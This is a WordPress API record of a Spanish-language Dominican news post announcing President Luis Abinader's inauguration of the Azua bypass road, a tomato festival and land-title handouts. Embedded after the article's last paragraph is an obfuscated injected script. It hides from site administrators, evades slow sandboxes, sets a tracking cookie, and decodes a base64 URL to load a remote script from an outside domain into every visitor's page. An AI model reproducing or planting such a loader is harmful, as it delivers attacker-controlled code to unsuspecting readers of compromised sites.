{"id":14078,"date":"2023-02-15T08:59:15","date_gmt":"2023-02-15T12:59:15","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14078"},"modified":"2023-02-15T08:59:15","modified_gmt":"2023-02-15T12:59:15","slug":"presidente-luis-abinader-inaugurara-hoy-circunvalacion-de-azua","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14078","title":{"rendered":"Presidente Luis Abinader inaugurar\u00e1 hoy  Circunvalaci\u00f3n de Azua"},"content":{"rendered":"<p>Santo Domingo. &#8211; Continuando con la inauguraci\u00f3n de obras, <strong>el Presidente Luis Abinader, dejar\u00e1 inaugurada este mi\u00e9rcoles la Circunvalaci\u00f3n de Azua<\/strong>, esperada por a\u00f1os por los habitantes de la regi\u00f3n Sur.<\/p>\n<p>La Circunvalaci\u00f3n de Azua tiene una\u00a0<strong>longitud de 12 kil\u00f3metros<\/strong>\u00a0y ser\u00e1 de dos carriles con 12 puentes tipo caj\u00f3n, barandas protectoras laterales, se\u00f1alizaci\u00f3n horizontal y vertical.<\/p>\n<p>Esta importante infraestructura comunicar\u00e1 las provincias de Azua, San Juan, Barahona, Pedernales, Independencia, Bahoruco, Peravia, San Crist\u00f3bal, y Distrito Nacional.<\/p>\n<p>En acto previo a la inauguraci\u00f3n de la important\u00edsima v\u00eda, el mandatario asistir\u00e1 a la inauguraci\u00f3n del\u00a0<strong>primeFestival del Tomate 2023<\/strong>, que se realizar\u00e1 desde 15 al 19 de este mes de febrero como una iniciativa de la\u00a0<strong>Gobernaci\u00f3n Provincial con el apoyo del Fondo Especial para el Desarrollo Agropecuario (FEDA).<\/strong><\/p>\n<p>Posteriormente, el gobernante, junto a la Unidad T\u00e9cnica Ejecutora de Titulaci\u00f3n de Terrenos del Estado (UTECT), entregar\u00e1\u00a0<strong>t\u00edtulos de propiedad en la comunidad de Villa Coraz\u00f3n de Jes\u00fas<\/strong>\u00a0en el Distrito Municipal de El Barro.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo. &#8211; Continuando con la inauguraci\u00f3n de obras, el Presidente Luis Abinader, dejar\u00e1 inaugurada este mi\u00e9rcoles la Circunvalaci\u00f3n de Azua, esperada por a\u00f1os por los habitantes de la regi\u00f3n Sur. La Circunvalaci\u00f3n de Azua tiene una\u00a0longitud de 12 kil\u00f3metros\u00a0y ser\u00e1 de dos carriles con 12 puentes tipo caj\u00f3n, barandas protectoras laterales, se\u00f1alizaci\u00f3n horizontal y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14080,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14078","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14078","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14078"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14078\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/14080"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14078"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14078"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}